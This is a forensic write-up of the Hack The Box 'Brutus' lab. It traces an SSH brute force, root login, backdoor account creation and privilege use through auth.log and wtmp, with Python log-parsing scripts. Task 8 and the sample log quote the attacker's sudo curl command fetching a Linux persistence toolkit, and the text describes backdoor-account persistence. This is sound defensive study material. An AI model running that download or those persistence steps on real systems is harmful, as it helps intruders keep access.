Brutus – Hack The Box Sherlock

Unix auth.log and wtmp log analysis

Task 1 – Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?

  • Analyzing auth.log, we find repeated failed authentication attempts from 65.2.161.68

Task 2 – The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account?

  • We find a successful authentication for the user root

Task 3 – Identify the UTC timestamp when the attacker logged in manually to the server and established a terminal session to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.

  • The attacker's authentication is recorded at 2024-03-06 06:32:44
  • The login time recorded in wtmp, and therefore the answer, is 2024-03-06 06:32:45
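wtmp is a binary file rather than text, which is why the login time is read from it with `last -f` instead of grep, and `last` renders timestamps in the local timezone (set `TZ=UTC` when the task asks for UTC). The following reader is an added example, not part of the original writeup: it decodes the glibc `struct utmp` layout assumed here for x86_64 Linux (384-byte records) and pairs each login with the logout on the same tty. The two records it parses are constructed for this example from the user, source IP and timestamps reported in this writeup; the PID is a placeholder.

```python
import struct
from datetime import datetime, timezone

# Assumed layout: glibc struct utmp on x86_64 Linux, 384 bytes, little-endian,
# with the 2 bytes of padding after ut_type written explicitly.
UTMP_FORMAT = "<h2xI32s4s32s256shhi2i4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)  # 384
USER_PROCESS = 7  # ut_type: a user logged in on this line
DEAD_PROCESS = 8  # ut_type: the session on this line ended


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width C string."""
    return raw.split(b"\x00", 1)[0].decode("utf-8", "replace")


def _utc(tv_sec: int) -> str:
    """wtmp stores epoch seconds; format them explicitly as UTC, not local time."""
    return datetime.fromtimestamp(tv_sec, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_wtmp(data: bytes):
    """Yield one dict per 384-byte record."""
    if len(data) % UTMP_SIZE:
        raise ValueError("wtmp length is not a multiple of the record size")
    for off in range(0, len(data), UTMP_SIZE):
        fields = struct.unpack_from(UTMP_FORMAT, data, off)
        ut_type, pid, line, _ut_id, user, host = fields[:6]
        tv_sec = fields[9]  # ut_tv.tv_sec
        yield {"type": ut_type, "pid": pid, "line": _cstr(line),
               "user": _cstr(user), "host": _cstr(host), "utc": _utc(tv_sec)}


def sessions(data: bytes):
    """Pair each login (USER_PROCESS) with the logout (DEAD_PROCESS) on the same tty."""
    open_by_line, result = {}, []
    for rec in parse_wtmp(data):
        if rec["type"] == USER_PROCESS:
            open_by_line[rec["line"]] = rec
        elif rec["type"] == DEAD_PROCESS and rec["line"] in open_by_line:
            start = open_by_line.pop(rec["line"])
            result.append({"user": start["user"], "host": start["host"], "line": rec["line"],
                           "login_utc": start["utc"], "logout_utc": rec["utc"]})
    for start in open_by_line.values():  # still logged in at end of file
        result.append({"user": start["user"], "host": start["host"], "line": start["line"],
                       "login_utc": start["utc"], "logout_utc": None})
    return result


def make_record(ut_type: int, pid: int, line: str, user: str, host: str, when: datetime) -> bytes:
    """Build one record; used here only to construct sample data."""
    return struct.pack(UTMP_FORMAT, ut_type, pid, line.encode(), line[-4:].encode(),
                       user.encode(), host.encode(), 0, 0, 0,
                       int(when.timestamp()), 0, 0, 0, 0, 0, b"")


# Constructed sample: the login and logout from this writeup, placeholder PID 2667.
_LOGIN = datetime(2024, 3, 6, 6, 32, 45, tzinfo=timezone.utc)
_LOGOUT = datetime(2024, 3, 6, 6, 37, 24, tzinfo=timezone.utc)
SAMPLE_WTMP = (
    make_record(USER_PROCESS, 2667, "pts/1", "root", "65.2.161.68", _LOGIN)
    + make_record(DEAD_PROCESS, 2667, "pts/1", "", "", _LOGOUT)
)

if __name__ == "__main__":
    for s in sessions(SAMPLE_WTMP):
        print(s)
```

On a real artifact, pass the contents of the collected wtmp (`open(path, "rb").read()`) to `sessions()` instead of `SAMPLE_WTMP`. Because the record is fixed-width, a truncated file fails loudly rather than silently dropping the last login.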

Task 4 – SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

  • In the logs we find the session number assigned to the root account: 37

Task 5 – The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

  • In the logs we find that a new user, cyberjunkie, was added

Task 6 – What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account?

  • The MITRE technique to create a local account for persistence is T1136.001

Task 7 – What time did the attacker’s first SSH session end according to auth.log?

  • In Task 4, we found the attacker connected through session 37 as user root
  • Session 37 for user root ended at 2024-03-06 06:37:24

Task 8 – The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

  • In the logs, the user cyberjunkie executed the following command via sudo to download linper.sh, a Linux persistence toolkit:
    /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
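Tasks 1, 2, 4, 5, 7 and 8 are all answered from the same auth.log, and the lines that matter come from four different sources: sshd (failed and accepted passwords), systemd-logind (session numbers), useradd (new accounts) and sudo (elevated commands). The script below is an added example, not part of the original writeup, that pulls those facts out in one pass. Every sample line is constructed for this example: the hostname, PIDs, UID and the brute-force timestamps are placeholders, while the source IP, account names, session number and sudo command are the values reported in this writeup. Syslog-style auth.log carries no year and uses the host's local clock, so the analyst supplies the year.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample auth.log (Debian/Ubuntu syslog format); see lead-in for what is placeholder.
SAMPLE_AUTH_LOG = """\
Mar  6 06:31:31 srv01 sshd[2327]: Failed password for invalid user admin from 65.2.161.68 port 46380 ssh2
Mar  6 06:31:31 srv01 sshd[2331]: Failed password for root from 65.2.161.68 port 46390 ssh2
Mar  6 06:31:33 srv01 sshd[2335]: Failed password for root from 65.2.161.68 port 46400 ssh2
Mar  6 06:31:40 srv01 sshd[2340]: Failed password for invalid user test from 203.0.113.5 port 50122 ssh2
Mar  6 06:32:44 srv01 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:32:44 srv01 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 srv01 systemd-logind[411]: New session 37 of user root.
Mar  6 06:34:18 srv01 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:34:26 srv01 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:37:24 srv01 sshd[2411]: pam_unix(sshd:session): session closed for user root
Mar  6 06:37:24 srv01 systemd-logind[411]: Removed session 37.
Mar  6 06:39:38 srv01 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
"""

# Syslog envelope: "Mon dd HH:MM:SS host proc[pid]: message" (pid is optional, e.g. for sudo).
SYSLOG = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
                    r"(?P<proc>[\w.-]+)(?:\[\d+\])?: (?P<msg>.*)$")
FAILED = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED = re.compile(r"Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")
NEW_SESSION = re.compile(r"New session (?P<sid>\d+) of user (?P<user>\S+)\.")
REMOVED_SESSION = re.compile(r"Removed session (?P<sid>\d+)\.")
USERADD = re.compile(r"new user: name=(?P<user>[^,]+)")
SUDO = re.compile(r"^(?P<user>\S+) : TTY=\S+ ; PWD=\S+ ; USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")


def parse(text: str, year: int):
    """Yield (timestamp, process, message); the year is not in the log, so the caller supplies it."""
    for raw in text.splitlines():
        m = SYSLOG.match(raw)
        if not m:
            continue  # not a syslog-formatted line; skip rather than guess
        ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
        yield ts.strftime("%Y-%m-%d %H:%M:%S"), m["proc"], m["msg"]


def triage(text: str, year: int = 2024) -> dict:
    """Collect failed logins per IP, accepted logins, logind sessions, new users and sudo commands."""
    report = {"failed_by_ip": Counter(), "accepted": [], "sessions": {}, "new_users": [], "sudo": []}
    for ts, proc, msg in parse(text, year):
        if proc == "sshd":
            if (m := FAILED.search(msg)):
                report["failed_by_ip"][m["ip"]] += 1
            elif (m := ACCEPTED.search(msg)):
                report["accepted"].append({"user": m["user"], "ip": m["ip"], "utc": ts})
        elif proc == "systemd-logind":
            if (m := NEW_SESSION.search(msg)):
                report["sessions"][m["sid"]] = {"user": m["user"], "opened": ts, "closed": None}
            elif (m := REMOVED_SESSION.search(msg)) and m["sid"] in report["sessions"]:
                report["sessions"][m["sid"]]["closed"] = ts
        elif proc == "useradd" and (m := USERADD.search(msg)):
            report["new_users"].append(m["user"])
        elif proc == "sudo" and (m := SUDO.match(msg)):
            report["sudo"].append({"user": m["user"], "as": m["target"], "cmd": m["cmd"], "utc": ts})
    return report


def brute_force_sources(report: dict, threshold: int = 3) -> list:
    """IPs with at least `threshold` failed passwords, busiest first."""
    return [ip for ip, n in report["failed_by_ip"].most_common() if n >= threshold]


def brute_force_successes(report: dict) -> list:
    """Accepted logins from an IP that also produced failures: the brute force that worked."""
    return [a for a in report["accepted"] if a["ip"] in report["failed_by_ip"]]


if __name__ == "__main__":
    r = triage(SAMPLE_AUTH_LOG)
    print("brute-force sources:", brute_force_sources(r))
    print("successful after failures:", brute_force_successes(r))
    print("logind sessions:", r["sessions"])
    print("new users:", r["new_users"])
    print("sudo:", r["sudo"])
```

The session number in `New session 37 of user root.` is assigned by systemd-logind, and its matching `Removed session 37.` line is what gives the session end time in Task 7; the `pam_unix(sshd:session)` lines carry no number, which is why the script keys sessions on the logind messages. The failure threshold is deliberately low for the sample; on a real host, tune it against the normal rate of typos.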